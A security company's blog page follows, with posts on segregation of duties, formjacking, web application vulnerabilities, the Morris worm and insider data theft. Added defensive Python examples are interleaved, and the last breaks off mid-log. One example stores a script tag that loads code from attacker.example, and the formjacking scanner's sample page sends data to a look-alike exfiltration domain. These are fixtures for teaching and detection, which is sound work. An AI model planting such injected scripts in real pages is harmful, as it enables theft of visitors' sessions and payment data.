Cybersecurity Blog
Thought leadership. Threat analysis. Cybersecurity news and alerts.
Why is Segregation of Duties Between IT and Cybersecurity Critical for Your Business?

Neglecting your cybersecurity means neglecting your business’s future. It’s that simple. Every company has to take effective action to minimize its risk of a data breach, leveraging the latest, most effective measures to combat hackers. Software specialist Citrix is just one of the latest brands to come under attack: it’s believed as much as 10TB may have been stolen. Furthermore, the criminals are said to have gained access to the system through ‘password spraying’, or simply guessing weak, common passwords.

It’s paramount to ensure your business is protected and prepared to deal with any serious cyberattack sent your way. One key aspect of safeguarding your company is Segregation of Duties between IT and cybersecurity. What does that mean and how do you do it?

SoD Defined

Segregation of Duties (or SoD) revolves around keeping multiple people involved in achieving a specific goal, whatever the task at hand may be. Though it started as a process to minimize the danger of mistakes or fraudulent activities, SoD has evolved into an important security measure. All tasks covered require authorization from two parties to prove integrity and defend against breaches. All individuals involved in undertaking a process of any size have to be in agreement before the task can be completed.

Segregation of Duties is so important because it takes absolute power out of the hands of any one person within your company, offering greater peace of mind and caution. SoD spreads privileges for everyone’s benefit and makes cybercriminals’ ‘work’ a little harder.

Key Benefits of Segregation of Duties

Segregation of Duties offers businesses numerous compelling benefits, including the following:

Reduce the risk of inside attacks

You trust your employees to work with your system every day. You expect them to be respectful, careful and loyal.
You put your faith in them to help steer your company toward success. And yet, inside attacks are a sad reality of cybersecurity breaches. Not only can an issue caused from the inside be more difficult to detect until it’s too late, but it can be particularly devastating on an emotional level if the attack was intentional. Dealing with a mistake is one thing. But knowing that an employee you paid and supported facilitated an attack can leave you, and their colleagues, struggling to trust others in the future.

Oversights may cause accidental inside attacks too. This may come down to an employee downloading an attachment from a suspicious email, failing to follow standard practice when making company payments or something equally minor.

Segregation of Duties takes care of all this. For example, if one worker is preparing to download a new tool but requires another’s agreement first, they may discover a security risk before any harm is done. This reduces the danger of genuine accidents caused by ignorance and acts as a deterrent for insiders looking to sabotage the business. Should any attack take place, it’s far easier to determine which party must have been responsible simply by looking at the individuals with access. This is much more difficult when everyone in the company uses every aspect of the system without restraint.

Less power is up for grabs

Imagine if a hacker manages to gain access to your system by cracking an employee’s login details. Imagine if said employee has full access to every tool, every database, every service — a criminal could basically take control of your business and cause monumental damage before they’re shut down.

With Segregation of Duties, you can minimize the power any hacker would wield should they find a way into your network. Accounts are shared between a small group of people and only they have authorized entry. Any sign of unexpected activity within those accounts would indicate a potential issue.
Furthermore, all areas of your company which require a different set of credentials to enter would remain secure. This allows you to focus your attention on the problem areas rather than addressing the entire company.

Accounts and credentials are easier to manage

Businesses implementing SoD can manage access and credentials more easily in the event of a crisis. Specifically, creating new logins for a compromised account is much easier with just two people to update. It’s a convenient, faster process with less room for error.

Segregation of Duties Between IT and Cybersecurity

Segregation of Duties between your IT department and cybersecurity specialists is vital for reinforcing your business’s defense against hackers. Your IT team may be experienced, well-trained and qualified, but they have to make sure they’re up to date on the latest risks, techniques and solutions in cybersecurity. Without this knowledge, they’re more likely to make mistakes when updating systems, maintaining your network or working with vendors. Again, SoD means making sure your IT specialists are accountable and have to run their intentions by someone else. The smallest oversight could end up causing massive disruption and effectively shut your business down on a temporary (or possibly permanent) basis.

Segregation of Duties demands a responsible approach: keep track of which individuals have access to specific accounts and which are authorized to perform certain tasks. Make sure to limit any crossover that could cause problems, such as putting the same person in two or three teams. This may lead to a conflict of interest and questionable choices.

Working with experienced cybersecurity experts is crucial for companies of all sizes, across all industries. Businesses have to take charge of their own protection and implement strategies designed to limit the damage a single attack is capable of. All companies must stay organized and plan ahead when implementing an SoD strategy.
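As an added example (not code from the original post), the checks this section describes expressed as a small policy script: it finds people who hold two roles the policy says must never be combined, pre-checks a role grant for the same crossover, and refuses a task unless a second, different person holding the approving role signs off. The role names, conflict pairs and user assignments are constructed placeholders, not a real role catalogue.

```python
"""Added example (not from the original post): a small script that applies a
Segregation of Duties policy to role assignments and to task approval.
The role names, conflict pairs and user data are constructed placeholders."""

# Constructed policy: pairs of roles one person must never hold together.
# The IT side implements changes and administers accounts; the security side
# approves changes and reviews access.
SOD_CONFLICTS = {
    frozenset({"it_change_implementer", "security_change_approver"}),
    frozenset({"account_administrator", "access_reviewer"}),
    frozenset({"payment_preparer", "payment_approver"}),
}

# Constructed sample assignments: who currently holds which roles.
USER_ROLES = {
    "alice": {"it_change_implementer"},
    "bob": {"security_change_approver"},
    "carol": {"account_administrator", "access_reviewer"},  # an SoD violation
    "dave": {"payment_preparer", "it_change_implementer"},
}


def find_sod_violations(user_roles, conflicts=SOD_CONFLICTS):
    """Return {user: [conflicting role pairs]} for every user who holds both
    roles of a conflicting pair."""
    violations = {}
    for user, roles in user_roles.items():
        hits = sorted(tuple(sorted(pair)) for pair in conflicts if pair <= roles)
        if hits:
            violations[user] = hits
    return violations


def can_grant_role(user, new_role, user_roles, conflicts=SOD_CONFLICTS):
    """Pre-check for an access request: would granting new_role create a
    conflict with the roles the user already holds?"""
    would_hold = user_roles.get(user, set()) | {new_role}
    return not any(pair <= would_hold for pair in conflicts)


def authorize_task(task, requester, approver, user_roles, required_role):
    """Dual control: the task proceeds only when a different person, holding
    the approving role, signs off. Returns (allowed, reason)."""
    if requester == approver:
        return False, f"{task}: requester and approver must be different people"
    if required_role not in user_roles.get(approver, set()):
        return False, f"{task}: {approver} does not hold the {required_role} role"
    return True, f"{task}: approved by {approver} at the request of {requester}"


if __name__ == "__main__":
    for user, pairs in find_sod_violations(USER_ROLES).items():
        print(f"SoD violation: {user} holds {pairs}")
    print(can_grant_role("alice", "security_change_approver", USER_ROLES))
    print(authorize_task("firewall change", "alice", "bob", USER_ROLES,
                         "security_change_approver"))
    print(authorize_task("firewall change", "alice", "alice", USER_ROLES,
                         "security_change_approver"))
```

The conflict set is where the post’s advice about limiting team crossover becomes concrete: each pair names an IT duty and the cybersecurity duty that is supposed to check it, so running the first function over a real role export lists exactly the people who would be checking their own work.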
Cybersecurity professionals can advise you on the major threats your business faces and how best to protect against them. Cybersecurity experts will help you understand what that involves, how to implement Segregation of Duties and how to combat even the most creative cybercriminals.

Want to learn what The Driz Group can do for your company? Please don’t hesitate to reach out to our dedicated team now.

Trend Shows Cybercriminals Are Turning to Formjacking

A newly released global cyberthreat trend report shows that cybercriminals are turning to formjacking as a new get-rich-quick scheme. In its recently released Internet Security Threat Report, Symantec reported that on average, more than 4,800 unique websites are compromised with formjacking every month.

According to Symantec, formjacking has increased dramatically since mid-August 2018. By the end of 2018, Symantec said it had detected 3.7 million formjacking attacks, with nearly a third of all detections occurring during November and December – the busiest online shopping period. Symantec said that while any organization, regardless of size and location, which processes payments online is a potential victim of formjacking, small and medium-sized retailers are, by and large, the most widely compromised by formjacking attackers.

What Is Formjacking?

Formjacking is a type of cyberattack that injects malicious code into website forms. This malicious code allows attackers to steal credit card details and other personal and financial information entered into the compromised forms, as the information is automatically sent to the attackers. Stolen information could be used by attackers to commit payment card fraud, or attackers could sell these details to other cybercriminals. According to Symantec, attackers need only 10 stolen credit cards from each of the more than 4,800 compromised websites each month to earn up to $2.2 million per month, considering that the current value of each card is $45 on underground selling forums.
How Are Formjacking Attacks Carried Out?

In recent months, two methods of formjacking attack were observed: the supply chain attack and the redirection chain.

Supply Chain Attack

One of the ways by which formjacking attackers gain access to a website and change the code on its checkout page is through a supply chain attack. In a supply chain attack, attackers gain access to a large organization’s website and change the code on its checkout page by exploiting security vulnerabilities in a smaller business the larger company uses to provide various services.

The Ticketmaster formjacking case is an example of a formjacking attack carried out by means of a supply chain attack. In the Ticketmaster case, attackers injected malicious code into Ticketmaster’s checkout pages after compromising a chatbot used by Ticketmaster for customer support. This malicious code enabled the Ticketmaster attackers to capture payment card data and other information from customers and send it to their servers.

The chatbot used by Ticketmaster for customer support was hosted by Inbenta, an external third-party supplier to Ticketmaster. Inbenta chief executive Jordi Torras told ZDNet that attackers exploited a number of vulnerabilities in Inbenta’s servers and in the process altered the chatbot code. "It has been confirmed that the source of the data breach was a single piece of JavaScript code, that was customized by Inbenta to meet Ticketmaster's particular requirements," Jordi Torras said. "The JavaScript we created specifically for Ticketmaster was used on a payments page, which is not what we built it for. Had we known that script would have been used in that way, we would have advised against it, as it poses a security threat."

The Ticketmaster formjacking case, therefore, wasn’t directly an attack against Ticketmaster but an attack on a third-party supplier, Inbenta.
It’s worth noting that a supply chain attack was also used in the NotPetya attack in 2017, in which MEDoc, a tax and accounting software package, was used for the initial insertion of the NotPetya malware into corporate networks. Supply chain attacks show that cybersecurity hygiene shouldn’t only be applied to an organization’s internal IT systems but also to third-party software and applications.

Redirection Chain

The redirection chain, as a means of carrying out a formjacking attack, is a new technique used by attackers in late 2018. In a redirection chain attack, a user who uses the checkout page of an online retailer is redirected to the checkout page of another online retailer which has been injected with formjacking code. When this user enters payment information, the information is sent both to the retailer and to the attackers.

In December 2018, Symantec reported that it had detected a checkout page of a retail store in Paris which was injected with formjacking code. The injected formjacking code, Symantec said, collects the payment information entered by customers and posts it to the domain google-analyitics.org. Symantec observed that popular online retailers’ checkout pages from different countries, such as the U.S., Japan, Australia, and Germany, redirected to this one Paris checkout page. “This created an interesting redirection chain as customers of all these websites were being infected by formjacking at the same time,” Symantec said.

Symantec added that, to make matters worse, the formjacking code in the above-mentioned redirection chain attack comes with Firebug, a debugging tool that prevents security researchers from analyzing the malicious code.

Prevention

Formjacking attacks are becoming sophisticated and stealthy, as shown in the above-mentioned examples. Users of compromised checkout pages may not realize they’re victims of formjacking, as compromised checkout pages generally continue to operate as normal.
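As an added illustration of the detection side (not code from the original post or from Symantec), the following script statically inspects a checkout page for script sources, form actions and request targets inside inline scripts that point outside an allowlist, and separately flags hosts that closely resemble an allowed one, the way google-analyitics.org resembles google-analytics.com. The sample page, the allowlist and every host except google-analyitics.org are constructed.

```python
"""Added example (not from the original post or Symantec's report): a static
check of a checkout page for scripts that load from, or send data to, hosts a
retailer never approved. Sample HTML, allowlist and hosts (other than
google-analyitics.org, which the post quotes) are constructed."""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed allowlist: the only hosts a checkout page may load scripts from
# or send data to.
ALLOWED_HOSTS = {"shop.example", "cdn.shop.example", "www.google-analytics.com"}

URL_RE = re.compile(r"https?://[A-Za-z0-9.\-]+(?:/[^\s'\"]*)?")


class ScriptCollector(HTMLParser):
    """Collect external script sources, inline script bodies and form actions."""

    def __init__(self):
        super().__init__()
        self.external, self.inline, self.form_actions = [], [], []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "script":
            if a.get("src"):
                self.external.append(a["src"])
            else:
                self._in_script = True
        elif tag == "form" and a.get("action"):
            self.form_actions.append(a["action"])

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            self.inline.append(data)


def levenshtein(a, b):
    """Edit distance, used to spot typo-squatted look-alike hosts."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def base_label(host):
    """'www.google-analytics.com' -> 'google-analytics' (rough second-level label)."""
    parts = host.lower().split(".")
    return parts[-2] if len(parts) >= 2 else parts[0]


def scan_checkout_page(html, allowed=ALLOWED_HOSTS):
    """Return sorted (kind, host, url) findings for hosts outside the allowlist;
    kind becomes 'lookalike' when the host's label is within 2 edits of an
    allowed host's label."""
    p = ScriptCollector()
    p.feed(html)
    candidates = [("script_src", u) for u in p.external]
    candidates += [("form_action", u) for u in p.form_actions]
    for body in p.inline:
        candidates += [("inline_request", u) for u in URL_RE.findall(body)]
    allowed_labels = {base_label(h) for h in allowed}
    findings = set()
    for kind, url in candidates:
        host = urlparse(url).hostname
        if not host or host in allowed:
            continue
        lookalike = any(levenshtein(base_label(host), lbl) <= 2 for lbl in allowed_labels)
        findings.add(("lookalike" if lookalike else kind, host, url))
    return sorted(findings)


# Constructed sample: a legitimate checkout page plus one injected inline script
# that names the exfiltration domain quoted in the post.
SAMPLE_PAGE = """
<html><body>
<form action="https://shop.example/pay" method="post">...</form>
<script src="https://cdn.shop.example/checkout.js"></script>
<script src="https://www.google-analytics.com/analytics.js"></script>
<script>sendData('https://google-analyitics.org/collect');</script>
</body></html>
"""

if __name__ == "__main__":
    for finding in scan_checkout_page(SAMPLE_PAGE):
        print(finding)
```

The same allowlist can be enforced at run time with a Content-Security-Policy header whose `script-src`, `connect-src` and `form-action` directives name only those hosts, which would block the injected request even if the static scan missed it; the scan is still useful because it runs on the third-party supplied page before deployment, which is where the Ticketmaster and Paris cases above went wrong.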
Here are some cybersecurity measures to prevent formjacking attacks:
Don’t have cybersecurity resources or a dedicated CISO? Contact us today to mitigate IT risks, fast.

3 Most Common Web Application Security Vulnerabilities

Almost all organizations today have an online presence, mostly in the form of an official website. While these websites open a window of opportunity for organizations, they are at times a bane to them, as they are becoming attractive targets for cyber attackers.

What Are Web Application Security Vulnerabilities?

One of the ways by which cyber attackers wreak havoc on corporate websites is by exploiting security vulnerabilities in web applications. Web applications, also known as web apps, are software programs that run in a web browser. A web application can be as simple as a contact form on a website or as large as a content management system like WordPress. A web application security vulnerability, meanwhile, is a system flaw or security weakness in a web application.

Web applications are gateways to a trove of data that cyber attackers find attractive and easy to steal. Every time website visitors sign up for an account, enter their credentials or make a purchase via an official corporate website, all this data, including personally identifiable information, is stored on a server that sits behind that web application. Exploiting a security vulnerability in a web application allows attackers to access the data stored on that server.

Imperva, in its “State of Web Application Vulnerabilities in 2018”, reported that the overall number of new web application vulnerabilities in 2018 increased by 23%, to 17,308, compared to 14,082 in 2017.

Most Common Web Application Security Vulnerabilities

Here are the 3 most common security vulnerabilities affecting web applications:

1. Injections

Based on Imperva’s data, the number one web application vulnerability in 2018 was injection, representing 19% of the web application vulnerabilities last year. In an injection attack, an attacker inserts or injects code into the original code of a web application, which alters the course of execution of the web app. According to Imperva, attackers’ preferred method last year of injecting code into web applications was remote command execution (RCE), with 1,980 vulnerabilities. Remote command execution allows an attacker to remotely take over the server that sits behind a web application by injecting arbitrary malicious code into the web app.

The Equifax data breach, which exposed highly sensitive data of millions of U.S. customers, as well as thousands of U.K. and Canadian consumers, is an example of a cyberattack that used the injection method, in particular remote command execution. Attackers gained access to the data of millions of Equifax’s customers by exploiting the vulnerability designated CVE-2017-5638 in the web application used by the company. At the time of the attack, Equifax was using an outdated version of Apache Struts, a popular open source framework for creating enterprise-grade web applications. Despite the advisory from the Apache Software Foundation, the organization that oversees leading open source projects, including Apache Struts, to update the software to the latest version, Equifax failed to do so, allowing the attackers to breach the sensitive data of millions of the company’s customers. On March 7, 2017, the Apache Software Foundation issued a patch, or security update, for the CVE-2017-5638 vulnerability. On May 13, 2017, about two months after the CVE-2017-5638 patch had been released, attackers started their 76-day cyberattack on Equifax, according to the findings of the U.S. House Oversight Committee.

2. Cross-Site Scripting

The second most common web application vulnerability is cross-site scripting.
According to Imperva, cross-site scripting ranked as the second most common vulnerability in 2018, representing 14% of the web application vulnerabilities last year. Cross-site scripting, also known as XSS, is a type of injection in which malicious code is inserted into a vulnerable web application. Unlike injection in general, cross-site scripting particularly targets web visitors.

In a cross-site scripting attack scenario, an attacker, for instance, embeds an HTML tag in an e-commerce website’s comments section, making the embedded tag a permanent fixture of the webpage. The browser then reads the embedded tag together with the rest of the original code every time the page is opened, even if the visitor never scrolls down to the comments section. The injected HTML tag in the comments section could load a file hosted on another site, allowing the attacker to steal visitors’ session cookies – the data that identifies a visitor’s logged-in session with the site. With the stolen session cookies of site visitors, attackers could gain access to the visitors’ personal information and credit card data.

3. Vulnerabilities in Content Management Systems

Imperva’s State of Web Application Vulnerabilities in 2018 also showed attackers focusing their attention on vulnerabilities in content management systems, in particular WordPress. Attackers are focusing their attention on WordPress as this content management system powers nearly one-third of the world’s websites. Data from W3Techs showed that as of late December last year, WordPress accounted for 32.9% of the world’s websites, followed by Joomla and Drupal. According to Imperva, the number of WordPress vulnerabilities increased in 2018 despite the slowed growth in new plugins. Imperva registered 542 WordPress vulnerabilities in 2018, the highest among the content management systems.
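The comments-section scenario from the cross-site scripting item above, as an added example that is not part of the original post: a vulnerable renderer that interpolates stored comments straight into the page, beside one that encodes them for the HTML text context, plus the cookie attributes that keep a session cookie out of reach of injected script. The comments, page template and host name are constructed.

```python
"""Added example (not from the original post): stored cross-site scripting via
a comments section, shown as a vulnerable renderer next to a hardened one.
The stored comments, template and host name are constructed."""
import html
import re

# Constructed sample comments as stored in the database. The second one is an
# attacker's stored payload: a tag that pulls a file from another site, as the
# post describes (a harmless placeholder host, not a real script).
STORED_COMMENTS = [
    "Great product, arrived on time.",
    '<script src="https://attacker.example/x.js"></script>',
]

PAGE = "<h1>Reviews</h1>\n<ul>\n{items}\n</ul>"


def render_vulnerable(comments):
    """Interpolates raw comment text into HTML: whatever was stored becomes part
    of the page for every visitor, whether or not they scroll down to it."""
    items = "\n".join(f"<li>{c}</li>" for c in comments)
    return PAGE.format(items=items)


def render_hardened(comments):
    """Encodes each comment for the HTML text context, so tags stay visible text."""
    items = "\n".join(f"<li>{html.escape(c, quote=True)}</li>" for c in comments)
    return PAGE.format(items=items)


# Active elements whose presence in the output, beyond what the template itself
# contains, indicates user content became markup.
TAG_RE = re.compile(r"<(script|img|iframe|svg|object)\b", re.IGNORECASE)


def injected_tags(rendered_html, template=PAGE):
    """Count active tags in the output that the template did not contribute."""
    return len(TAG_RE.findall(rendered_html)) - len(TAG_RE.findall(template))


def session_cookie_header(session_id):
    """Constructed Set-Cookie line: HttpOnly keeps the cookie out of
    document.cookie so injected script cannot read it; Secure and SameSite
    limit where it is sent."""
    return (f"Set-Cookie: session={session_id}; HttpOnly; Secure; "
            "SameSite=Lax; Path=/")


if __name__ == "__main__":
    print(render_vulnerable(STORED_COMMENTS))
    print("injected tags:", injected_tags(render_vulnerable(STORED_COMMENTS)))
    print(render_hardened(STORED_COMMENTS))
    print("injected tags:", injected_tags(render_hardened(STORED_COMMENTS)))
    print(session_cookie_header("constructed-session-id"))
```

Encoding at output time is the fix that matters: the comment is still stored exactly as submitted, but it reaches the browser as text, and the HttpOnly attribute limits what a script that slips through anyway can reach.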
The WordPress official website, meanwhile, reported that only 1,914, or 3% of the total 55,271 plugins, were added in 2018. Ninety-eight percent of WordPress vulnerabilities are related to plugins, Imperva reported. Plugins expand the features and functionality of a website. WordPress plugins are, however, prone to vulnerabilities, since with this content management system (being open source software) anyone can create a plugin and publish it without a security audit to ensure that the plugin adheres to minimum security standards.

Web Application Attack Prevention

A web application firewall (WAF) is one of the best cybersecurity solutions that your organization can employ against web application vulnerabilities. Trust the experienced team that protects hundreds of sites and applications. Protect your web application within 10 minutes and keep cybercriminals at bay. Get started today!

Look Back into the First Major Cyberattack: The Morris Worm

Thirty years ago, the Morris worm, dubbed the first major cyberattack, was unleashed into the wild, crashing or slowing to a crawl 10%, or 6,000, of the 60,000 computers then connected to the “Internet”.

What Is the Morris Worm?

The Morris worm is named after its creator, Robert Tappan Morris. A worm, meanwhile, is a type of malicious software (malware) that has the ability to spread itself within networks without user interaction. Court documents showed that Morris, then a first-year graduate student in Cornell University's computer science Ph.D. program, released the worm on November 2, 1988 through a computer at the Massachusetts Institute of Technology (MIT), which Morris hacked using a Cornell University computer. The Morris worm was released into the wild a year before the World Wide Web came into existence. The term “Internet” then referred to a U.S. computer network composed of connected computers from prestigious colleges, research centers, and governmental and military agencies.
In less than 24 hours on November 2, 1988, the Morris worm infected the computers of institutions including Harvard, Princeton, Stanford, Johns Hopkins, the National Aeronautics and Space Administration (NASA) and the Lawrence Livermore National Laboratory. While the worm didn’t destroy or damage files, infected computers slowed to a crawl or ceased functioning, and emails were delayed for days. The estimated cost of dealing with the Morris worm at each installation ranged from $200 to over $53,000.

The worm infected computers running a specific version of the Unix operating system in 4 ways:

First, via a security vulnerability in “SEND MAIL”, a computer program that transfers and receives electronic mail;

Second, via a security vulnerability in the "finger daemon", a computer program that allows extraction of limited information about the users of another computer;

Third, via the "trusted hosts" feature, which allows a user with certain privileges on one computer to have equivalent privileges on another computer without using a password; and

Fourth, via a program that guesses passwords using various combinations of letters tried out in rapid succession, hoping that one will be an authorized user's password. When the correct password is entered, the intruder is allowed whatever level of activity that the user is authorized to perform.

Morris designed the worm to stay hidden. The worm was designed in such a way that it wouldn’t copy itself onto a computer that already had a copy. The worm was also designed in such a way that it would be killed when a computer was shut down.

Consequences of the Morris Worm

For unleashing the worm into the wild, Morris became the first person convicted of violating the U.S. Computer Fraud and Abuse Act, which outlaws unauthorized access to protected computers. He was sentenced to 3 years of probation, 400 hours of community service, a fine of $10,050 and the costs of his supervision.
The first major cyberattack, perpetrated by the Morris worm, showed how vulnerable interconnected computers had become. Just days after the Morris worm attack, the U.S. Government created the country’s first computer emergency response team under the direction of the Department of Defense. Developers also began creating intrusion detection software. On the flip side, the Morris worm inspired a new breed of malicious hackers who have plagued the digital age since.

In recent memory, the worm that most resembles the devastation caused by the Morris worm is the WannaCry worm, commonly known as WannaCry ransomware. In less than 24 hours on May 12, 2017, more than 300,000 computers in 150 countries were infected by WannaCry, each demanding a ransom payment. WannaCry is categorized as a worm because, like the Morris worm, it has the ability to spread itself within networks without user interaction. WannaCry specifically exploited a security vulnerability in the Server Message Block protocol (SMB protocol) in some versions of Microsoft Windows. The SMB protocol allows users to access files, printers and other resources on a network.

Prevention

Here are some cybersecurity measures to protect your organization’s computers or networks from worms similar to WannaCry and the Morris worm:

Implement Network Segmentation

In network segmentation, vital computers that house critical information and operations are separated or disconnected from computers connected to vulnerable systems like the public internet. Network segmentation ensures that when internet-facing computers are infected by a worm, these vital computers aren’t affected.

Keep All Software Up-to-Date

Make sure that software security updates are installed as promptly as possible, not months or years after the release dates of the security updates. Cyberattackers have automated the process of scanning the internet to find vulnerable computers – those that fail to install security updates.
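As an added example (not from the original post), a small inventory check for the failure modes this Prevention section describes: hosts lagging on security updates, hosts running software whose vendor support has ended, and hosts reachable from the internet that expose the SMB port the post names. The inventory, listening ports and 30-day threshold are constructed; the two end-of-support dates are Microsoft’s published dates to the best of my knowledge and in practice should be read from the vendor’s lifecycle data rather than hard-coded.

```python
"""Added example (not from the original post): an inventory check for patch
lag, unsupported ("legacy") software and SMB exposure on internet-facing hosts.
Inventory, ports and thresholds are constructed for illustration."""
from datetime import date

# End-of-support dates as published by the vendor (verify against its
# lifecycle page before relying on them).
END_OF_SUPPORT = {
    "Windows XP": date(2014, 4, 8),
    "Windows Server 2003": date(2015, 7, 14),
}

MAX_PATCH_AGE_DAYS = 30       # constructed policy: updates applied within 30 days
SMB_PORT = 445
WANNACRY_DAY = date(2017, 5, 12)  # the date the post gives for the outbreak

# Constructed inventory: OS, date the last security update was applied,
# whether the host is reachable from the internet, and its listening TCP ports.
INVENTORY = [
    {"host": "web-01", "os": "Windows Server 2016", "last_patch": date(2017, 5, 9),
     "internet_facing": True, "ports": {443}},
    {"host": "file-01", "os": "Windows Server 2003", "last_patch": date(2015, 6, 1),
     "internet_facing": True, "ports": {SMB_PORT}},
    {"host": "ws-17", "os": "Windows 7", "last_patch": date(2017, 2, 1),
     "internet_facing": False, "ports": {SMB_PORT}},
    {"host": "ws-18", "os": "Windows 10", "last_patch": date(2017, 5, 10),
     "internet_facing": False, "ports": {SMB_PORT}},
]


def check_inventory(inventory, today, max_age=MAX_PATCH_AGE_DAYS, eos=END_OF_SUPPORT):
    """Return {host: [finding, ...]}; hosts with no findings are omitted."""
    findings = {}
    for h in inventory:
        issues = []
        eos_date = eos.get(h["os"])
        if eos_date and eos_date <= today:
            issues.append(f"unsupported OS {h['os']} (support ended {eos_date})")
        age = (today - h["last_patch"]).days
        if age > max_age:
            issues.append(f"security updates {age} days old (limit {max_age})")
        if h["internet_facing"] and SMB_PORT in h["ports"]:
            issues.append("SMB (TCP 445) exposed on an internet-facing host")
        if issues:
            findings[h["host"]] = issues
    return findings


def segmentation_ok(inventory):
    """Segmentation rule from the post, reduced to one check: no host that
    faces the internet may expose SMB to it."""
    return not any(h["internet_facing"] and SMB_PORT in h["ports"] for h in inventory)


if __name__ == "__main__":
    for host, issues in check_inventory(INVENTORY, WANNACRY_DAY).items():
        for issue in issues:
            print(f"{host}: {issue}")
    print("segmentation ok:", segmentation_ok(INVENTORY))
```

Run against the outbreak date, the constructed file server fails all three checks at once, which is the combination the post describes: an unsupported system, years behind on updates, with SMB reachable from the internet.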
This was the case for WannaCry victims, who failed to install the security update issued by Microsoft months before the WannaCry cyberattack.

Refrain from Using Legacy Hardware and Software

The term “legacy” refers to old and outdated computer hardware or software. Like computers that fail to install security updates in a timely manner, legacy hardware and software programs are targeted by cyberattackers, as these legacy hardware and software programs no longer receive security updates from their vendors. Some versions of Microsoft Windows (the Windows XP, Windows 8 and Windows Server 2003 operating systems) were targeted by the WannaCry attackers as well, as at the time of the attack these software programs were no longer supported by Microsoft. A day after the WannaCry attack, however, Microsoft released security updates for Windows XP, Windows 8 and Windows Server 2003.

Protecting computers or networks from worms and other malicious software is important in order to prevent data breaches. Under Canada’s Digital Privacy Act, starting November 1 this year, private organizations are mandated to notify the Privacy Commissioner of Canada and the affected individuals “as soon as feasible” in the event that a data breach poses a “real risk of significant harm” to any individual.

When you need help assessing and mitigating cybersecurity risks, contact our team of experts and minimize the likelihood of a data breach.

How to Prevent Departing Employees from Departing with Your Organization’s Data

The practice of departing employees departing with their employers’ data has recently been highlighted in the latest case, which sprang from one of the biggest tech companies, Apple.
A special agent at the Federal Bureau of Investigation (FBI) recently filed a criminal complaint before the US District Court for the Northern District of California against a former Apple employee, alleging that the former employee, who worked as a hardware engineer on the company’s autonomous vehicle development team, stole trade secrets from the company. According to the FBI special agent, because of the former employee's role on Apple’s autonomous vehicle development project, he was granted broad access to secure and confidential internal databases containing trade secrets and intellectual property for the project.

After returning from paternity leave, the said employee, according to the FBI special agent, resigned, saying that he planned to move back to his home country and that he also planned to work for another company also working in the field of autonomous vehicle technology. The said employee turned over all Apple-owned devices, and Apple's security team then disabled his remote network access, badge privileges, network access and other employee accesses.

The criminal complaint revealed that data from Apple’s security team showed that in the days prior to his resignation, the former Apple employee’s network activity increased exponentially compared to the prior two years of his employment. On the evening two days prior to his resignation, the employee was shown via CCTV footage entering the autonomous vehicle software and hardware labs and leaving the building less than an hour later carrying a large box. The criminal complaint also disclosed that in an interview with an Apple security attorney and an Apple employee relations representative, the accused former Apple employee admitted downloading data to a non-Apple device, one owned by his wife, because he had an "interest in platforms and wanted to study the data on his own."
The accused also admitted to FBI agents that he took files from Apple’s autonomous vehicle development project and transferred the files to a non-Apple digital device owned by his wife. Files recovered from the non-Apple device included a 25-page document containing schematics for one of the circuit boards that form Apple's proprietary infrastructure technology for its autonomous vehicle development project. FBI agents arrested Apple's former employee at San Jose International Airport as he was about to leave the country.

Prevalence of Departing Employees Stealing or Leaking Corporate Data
The case filed against a former Apple employee is just one of the many cases of departing employees departing with their employers’ data.
In 2014, the Federal Court of Australia found sufficient evidence that a former employee of Leica Geosystems Pty Ltd copied 190,000 files from the company’s computers the day before he resigned. The files copied by the former employee included numerous source code files representing the core of the company’s intellectual property. The Federal Court of Australia ordered the said employee to pay AUD$50,000 to his former employer as a fine for his misconduct.

In 2015, an employee of BlueScope, after learning she was to be terminated, downloaded 40 gigabytes of company documents. The company filed legal actions in the Federal Court of Australia and in Singapore to stop the information falling into the hands of its competitors. BlueScope and the former employee reached a confidential settlement. The Federal Court of Australia, meanwhile, permanently restrained BlueScope’s former employee from using the data in her possession.

A survey conducted by Biscom showed the prevalence of departing employees departing with their employers’ data. The Biscom survey showed the following alarming findings:
Data Leak Prevention

1. Limit Employee Access to Data

Only give employees access to the data needed to get their jobs done. For instance, engineers don’t need access to CRM systems.

2. Encrypt Critical Corporate Data

Ensure that critical corporate data, whether in transit, at rest or in use, is encrypted. Encryption ensures that even when there’s a data breach, the data will remain useless to whoever took it.

3. Establish Regular IT Audits

While automated, preventative controls are the best defense, no technology is perfect. Establishing regular IT audits performed by an independent third party will help you detect any outliers and catch data leaks and internal fraud early on. Such audits generally include

4. Require Appropriate Authentication for Critical Content

Accessing critical content must require not just a username and password but also multi-factor authentication. When critical content is being accessed, it also helps if approval must be secured first or an alert is sent to a compliance officer.

5. Regularly Monitor Network Activities

An unusual volume of downloaded data and data access outside office hours are examples of network activities that should be monitored. Such network activities are red flags for unauthorized activity and should be checked.

6. Keep Critical Data Offline

Don't store information vital to your organization, especially trade secrets, on any device that connects to the internet.

7. In-Person Data Security and Privacy Training

One of the means, though not a cure-all, of preventing departing employees from stealing corporate data is providing in-person data security training the moment an employee is hired. One training session isn't enough. It's best to regularly remind employees about safeguarding the company’s data by implementing regular, formal cybersecurity awareness training.
In addition to the in-person data security and privacy training, a confidentiality or non-disclosure provision has to be included in employment contracts.

8. Don’t Give Employees Administrator Privileges

Don’t give employees administrator rights on company-supplied computers or devices. Giving them administrator privileges allows them to install malicious software (malware) that could lead to unauthorized access to information vital to your organization.
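Measure 5 above (monitoring for unusual download volume and out-of-hours access) in working form, as an added example that is not part of the original post. It runs over constructed download-audit records and raises an alert when a user’s daily volume far exceeds their own median, the pattern the Apple complaint above describes, and separately lists access outside office hours. The log format, user names, office hours and spike factor are constructed.

```python
"""Added example (not from the original post): spike and off-hours detection
over constructed download-audit records."""
from collections import defaultdict
from datetime import datetime
from statistics import median

# Constructed audit records: "<ISO timestamp> <user> <bytes downloaded>".
# jsmith's last two entries are the late-night bulk downloads to be caught.
AUDIT_LOG = """
2018-07-02T09:15:00 jsmith 12000000
2018-07-03T10:02:00 jsmith 8000000
2018-07-04T11:30:00 jsmith 15000000
2018-07-05T14:45:00 jsmith 9000000
2018-07-06T09:20:00 jsmith 11000000
2018-07-09T22:40:00 jsmith 2600000000
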